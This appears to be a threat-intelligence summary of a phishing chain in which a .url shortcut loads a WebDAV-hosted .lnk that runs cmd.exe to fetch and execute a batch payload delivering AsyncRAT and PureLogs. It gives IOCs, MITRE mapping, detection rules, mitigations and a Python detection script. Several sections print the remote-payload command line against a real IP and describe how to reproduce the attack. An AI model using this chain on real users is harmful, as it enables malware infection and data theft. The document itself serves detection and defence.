Keypoints
- Attack chain: phishing -> zipped URL file (.url) -> WebDAV-hosted .lnk -> .bat download -> malware (AsyncRAT, PureLogs).
- Offensive steps: create .lnk that runs cmd.exe to copy and execute a .bat from a WebDAV server, host files with WsgiDAV on a chosen port (e.g., 3001).
- Observed artifacts: URL file content with “URL=file://”, WebDAV path containing DavWWWRoot, on-disk temporary LNKs in Tfs_DAV, and command-lines referencing remote host@port.
- Detection signatures provided: YARA rules for URL and LNK detection, a SIGMA rule to catch cmd.exe command-line patterns, and Suricata signatures for LNK downloads.
- IOC examples include the remote IP:port used in examples (101.99.94.234:9809), DavWWWRoot directory references, and payload filenames saved to %USERPROFILE%\Pictures.
- Mitigation: block execution of .url files in Windows and monitor for command lines containing remote-host patterns (e.g., “*@*”).
MITRE Techniques
- [T1204.001] Malicious Link – Attack used an Internet Shortcut (.url) that points to a WebDAV resource to trigger downstream payload retrieval (‘[InternetShortcut]’ and ‘URL=file://’).
- [T1204.002] Malicious File – A .lnk shortcut placed on disk contains a command to copy and execute a .bat from the remote server (‘C:\Windows\System32\cmd.exe /c copy "\\101.99[.]94.234@9809\DavWWWRoot\file.bat" "%USERPROFILE%\Pictures\file.bat" && "%USERPROFILE%\Pictures\file.bat"’; the source path is reconstructed here from the host@port and DavWWWRoot pattern shown in the IoC section).
- [T1105] Ingress Tool Transfer – Remote transfer of the .lnk and .bat payloads from the WebDAV server to the victim host (‘LNK file download logs from WebDav server’).
- [T1059.003] Command and Scripting Interpreter: Windows cmd – cmd.exe is invoked to copy and run the batch payload on the host (‘cmd.exe /c copy … && …’).
- [T1071.001] Application Layer Protocol: Web Protocols – WebDAV (HTTP-based) is used as the transport for hosting and retrieving malicious artifacts (‘WebDAV server has started on port 3001’ and ‘DavWWWRoot’).
Indicators of Compromise
- [IP Address] remote WebDAV server – 101.99.94.234:9809 (seen in .lnk command line), and other attack server addresses referenced in network logs.
- [Domain] phishing host used to host URL file – TryCloudFlare (phishing domain observed in the malicious URL file).
- [File Path / Directory] temporary and target locations – Tfs_DAV (temp directory where .lnk is saved), %USERPROFILE%\Pictures\file.bat (destination and execution path).
- [File Name / Extension] shortcut and payload filenames – randomly-named .lnk (GUID-style name created on disk), file.bat (downloaded batch script).
- [URL / Protocol] WebDAV path patterns – presence of ‘DavWWWRoot’ and ‘file.lnk’ in URLs (e.g., file://101.99.94.234@9809/DavWWWRoot/file.lnk).
To reproduce the attack and analyze detection points: set up a WebDAV server (WsgiDAV) on an attacker host and place a malicious .lnk there that invokes cmd.exe to copy a .bat from the WebDAV path into a user-writable directory and execute it. Deliver an Internet Shortcut (.url) to a victim (commonly via a ZIP/Dropbox-phishing attachment); when the user opens the .url, Windows resolves the file:// WebDAV link, causing a LNK file to be saved under a temporary Tfs_DAV directory and then executed. The LNK typically contains a command like: C:\Windows\System32\cmd.exe /c copy "\\101.99.94.234@9809\DavWWWRoot\file.bat" "%USERPROFILE%\Pictures\file.bat" && "%USERPROFILE%\Pictures\file.bat" (source path reconstructed from the host@port and DavWWWRoot pattern in the IoC section), which downloads and runs the BAT payload that retrieves malware such as AsyncRAT and PureLogs.
Detection can be implemented at multiple layers: file-hunting rules (YARA) to match .url content (look for ‘[InternetShortcut]’ and ‘URL=file://’) and on-disk .lnk patterns (binary header + IP@port/WebDAV regex), process creation monitoring (SIGMA) to catch cmd.exe command lines containing remote-host patterns like ‘.+@.+’, and network IDS (Suricata) signatures to flag LNK or .bat downloads over HTTP/WebDAV. Example signatures in the article include a YARA for URL files, a YARA for LNK files with WebDAV IP patterns, a SIGMA rule detecting CommandLine regex “.+@.+”, and Suricata rules for “LNK File Downloaded via HTTP”.
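As an added illustration (not code from the ANY.RUN article), the two file- and process-level checks described above expressed in Python: a YARA-equivalent test for an Internet Shortcut pointing at file://, and a SIGMA-style command-line match that is tightened from the article's broad ".+@.+" to the host@port\DavWWWRoot UNC form Windows produces for WebDAV shares, so that benign user@host strings do not fire. The telemetry lines are constructed samples.

```python
import re

# Constructed sample telemetry: one .url file body and three process command lines
# (the first mirrors the article's chain, the other two are benign controls).
SAMPLE_URL_FILE = "[InternetShortcut]\r\nURL=file://101.99.94.234@9809/DavWWWRoot/file.lnk\r\n"
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\cmd.exe /c copy "\\101.99.94.234@9809\DavWWWRoot\file.bat" '
    r'"%USERPROFILE%\Pictures\file.bat" && "%USERPROFILE%\Pictures\file.bat"',
    r'C:\Windows\System32\cmd.exe /c echo hello',
    r'"C:\Program Files\Git\cmd\git.exe" clone https://git@example.com/repo.git',
]

# WebDAV UNC path as Windows writes it: \\<host>@<port>\DavWWWRoot\<file>
WEBDAV_UNC = re.compile(
    r'\\\\(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9.-]+)@(?P<port>\d{1,5})'
    r'\\(?P<path>DavWWWRoot\\[^"\s]+)',
    re.IGNORECASE,
)


def webdav_url_file_target(content: str):
    """Mirror the article's URL-file YARA logic: an [InternetShortcut] section whose
    URL= line starts with file://. Returns the target URL, or None if not matched."""
    lines = [line.strip() for line in content.splitlines()]
    if "[InternetShortcut]" not in lines:
        return None
    for line in lines:
        if line.lower().startswith("url=file://"):
            return line[len("URL="):]
    return None


def match_cmdline(cmdline: str):
    """Mirror the article's SIGMA idea on process-creation telemetry: cmd.exe invoked
    with a remote host@port WebDAV path. Returns (host, port, path) or None."""
    if "cmd.exe" not in cmdline.lower():
        return None
    m = WEBDAV_UNC.search(cmdline)
    if not m:
        return None
    return m.group("host"), int(m.group("port")), m.group("path")


def scan_cmdlines(cmdlines):
    """Return only the command lines that matched, paired with the extracted IoC."""
    hits = [(c, match_cmdline(c)) for c in cmdlines]
    return [(c, ioc) for c, ioc in hits if ioc is not None]


if __name__ == "__main__":
    print(webdav_url_file_target(SAMPLE_URL_FILE))
    for cmd, ioc in scan_cmdlines(SAMPLE_CMDLINES):
        print(ioc, "<-", cmd)
```

Feeding the extracted host and port into a block list or a Suricata/network search closes the loop with the IDS-layer detections the article lists.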
Mitigation recommendations: prevent user execution of .url files through Windows policy controls, monitor and block WebDAV-hosted file retrievals from untrusted hosts, and hunt for the specific artifacts described (Tfs_DAV temporary LNK creation, cmd.exe invocations with remote-host@port patterns, and DavWWWRoot occurrences in logs). Combine endpoint file detection, process creation telemetry, and network IDS alerts to cover the full chain.
Read more: https://any.run/cybersecurity-blog/client-side-exploitation/